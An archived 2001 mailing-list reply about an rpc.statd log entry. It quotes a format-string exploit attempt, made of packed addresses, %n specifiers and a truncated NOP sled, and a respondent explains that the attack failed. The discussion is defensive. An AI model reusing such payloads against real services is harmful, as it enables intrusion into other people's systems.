Re: rpc.statd
On Sun, 8 Apr 2001 18:04:54 -0400
"Robert Bartels" <rbartels@qx.net> wrote:
> I saw this in my logs today.
>
> Apr 8 15:08:43 mikado rpc.statd[179]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%1
> 37x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\2!
> 20\220\220\220\220\220\220\220\220\220
>
> It looks like statd is still running. Is rpc still vulnerable? Is there a
> way to track down who
> connected to rpc.statd?
> I'm running unstable and update every other day...
Looks like someone _tried_ to compromise your rpc.statd, and failed miserably.
You wouldn't have gotten that log message had they succeeded, since it would
have crashed rpc.statd, presumably starting a shell or something as it dies.
In other words, feel free to laugh, as some script kiddie got schooled by your
ultra-secure Debian system. ;)
Regards,
Alex.
Reply to:
- Follow-Ups:
- Re: rpc.statd
- From: "Sander Smeenk \(CistroN Medewerker\)" <ssmeenk@cistron.nl>
- References:
- rpc.statd
- From: "Robert Bartels" <rbartels@qx.net>